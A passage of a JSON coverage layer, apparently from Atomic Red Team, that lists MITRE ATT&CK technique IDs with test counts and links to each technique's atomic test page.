Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":76,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":111,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View 